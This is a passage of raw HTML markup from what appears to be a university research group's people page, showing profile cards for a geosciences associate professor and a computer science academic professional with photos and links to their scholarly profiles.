class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c60\">\n <!---->\n <!---->\n <h4 class=\"\">Hassan Babaie</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Associate Professor\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c64-outer\">\n <div data-colibri-id=\"182-c64\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c64 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c65\" class=\"d-block style-973 style-local-182-c65 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Faris-e1697216253732.jpg\" class=\"wp-image-1814 style-973-image style-local-182-c65-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c65-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-974 style-local-182-c66 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c66\">\n <!---->\n <!---->\n <h4 class=\"\">Faris Hawamdeh</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-975 style-local-182-c67 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Academic Professional\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c68\" class=\"h-text h-text-component style-976 style-local-182-c68 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c69\" class=\"style-977 style-local-182-c69 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/faris-hawamdeh/?trk=public_profile_publication_contributor-image\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/faris-hawamdeh/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.researchgate.net/profile/Faris-Hawamdeh\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c73\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c73 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c146\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c146 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c147-outer\">\n <div data-colibri-id=\"182-c147\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c147 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div 